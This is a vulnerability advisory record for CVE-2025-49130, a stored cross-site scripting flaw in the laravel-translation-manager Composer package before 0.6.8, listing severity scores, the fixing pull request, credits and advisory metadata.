CVE-2025-49130 – barryvdh/laravel-translation-manager

Package

Manager: composer
Name: barryvdh/laravel-translation-manager
Vulnerable Version: >=0 <0.6.8

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N/E:H/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

EPSS: 0.00065 pctl0.20514

Details

Laravel Translation Manager Vulnerable to Stored Cross-site Scripting ### Impact The application is vulnerable to Cross-Site Scripting (XSS) attacks due to incorrect input validation and sanitization of user-input data. An attacker can inject arbitrary HTML code, including JavaScript scripts, into the page processed by the user's browser, allowing them to steal sensitive data, hijack user sessions, or conduct other malicious activities. ### Patches The issue is fixed in https://github.com/barryvdh/laravel-translation-manager/pull/475 which is released in version 0.6.8 ### Workarounds Only authenticated users with access to the translation manager are impacted. ### References [[PT-2025-04] laravel translation manager.pdf](https://github.com/user-attachments/files/20639250/PT-2025-04.laravel.translation.manager.pdf) ### Reported by Positive Technologies (Artem Deikov, Ilya Tsaturov, Daniil Satyaev, Roman Cheremnykh, Artem Danilov, Stanislav Gleym)

Metadata

Created: 2025-06-09T13:15:19Z
Modified: 2025-06-09T15:55:56Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-j226-63j7-qrqh/GHSA-j226-63j7-qrqh.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-j226-63j7-qrqh
Finding: F425
Auto approve: 1